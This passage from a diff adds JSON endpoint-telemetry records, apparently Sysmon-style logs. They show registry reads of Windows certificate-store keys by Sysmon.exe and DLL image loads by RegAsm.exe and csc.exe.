"C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570861990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570861990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570861990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570861990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570861990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + 
"event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570861990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570861990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570861990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 5012, + "process_name": "RegAsm.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", + "timestamp": 131883570861990000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\SysWOW64\\kernel32.dll", + "pid": 5012, + "process_name": "RegAsm.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", + "timestamp": 131883570861990000, + "unique_pid": 
"{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" + }, + { + "event_type": "image_load", + "image_name": "user32.dll", + "image_path": "C:\\Windows\\System32\\user32.dll", + "pid": 5012, + "process_name": "RegAsm.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", + "timestamp": 131883570861990000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" + }, + { + "event_type": "image_load", + "image_name": "wow64cpu.dll", + "image_path": "C:\\Windows\\System32\\wow64cpu.dll", + "pid": 5012, + "process_name": "RegAsm.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", + "timestamp": 131883570861990000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" + }, + { + "event_type": "file", + "file_name": "CSC.EXE-F7BE4369.pf", + "file_path": "C:\\Windows\\Prefetch\\CSC.EXE-F7BE4369.pf", + "pid": 1692, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "timestamp": 131883570861990000, + "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\SysWOW64\\kernel32.dll", + "pid": 5012, + "process_name": "RegAsm.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", + "timestamp": 131883570862150000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\SysWOW64\\KernelBase.dll", + "pid": 5012, + "process_name": "RegAsm.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", + "timestamp": 131883570862150000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570862150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570862150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570862150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570862150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570862150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": 
"Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570862150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570862150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570862150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570862150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570862150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570862150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570862150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570862150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570862150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570862150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570862150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570862150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570862150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570862150000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570862150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570862150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570862150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570862150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "user32.dll", + "image_path": "C:\\Windows\\SysWOW64\\user32.dll", + "pid": 3592, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "timestamp": 
131883570860110000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570862150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\SysWOW64\\msvcrt.dll", + "pid": 5012, + "process_name": "RegAsm.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", + "timestamp": 131883570862300000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" + }, + { + "event_type": "image_load", + "image_name": "user32.dll", + "image_path": "C:\\Windows\\SysWOW64\\user32.dll", + "pid": 5012, + "process_name": "RegAsm.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", + "timestamp": 131883570862300000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" + }, + { + "event_type": "image_load", + "image_name": "gdi32.dll", + "image_path": "C:\\Windows\\SysWOW64\\gdi32.dll", + "pid": 5012, + "process_name": "RegAsm.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", + "timestamp": 131883570862300000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" + }, + { + "event_type": "image_load", + "image_name": "gdi32full.dll", + "image_path": "C:\\Windows\\SysWOW64\\gdi32full.dll", + "pid": 5012, + "process_name": "RegAsm.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", + "timestamp": 131883570862300000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" + }, + { + "event_type": "registry", + 
"pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570862300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570862300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570862300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570862300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + 
"registry_value": "CTLs", + "timestamp": 131883570862300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570862300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570862300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570862300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570862300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": 
"Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570862300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570862300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570862300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570862300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570862300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + 
{ + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570862300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570862300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570862300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570862300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570862300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570862300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570862300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570862300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 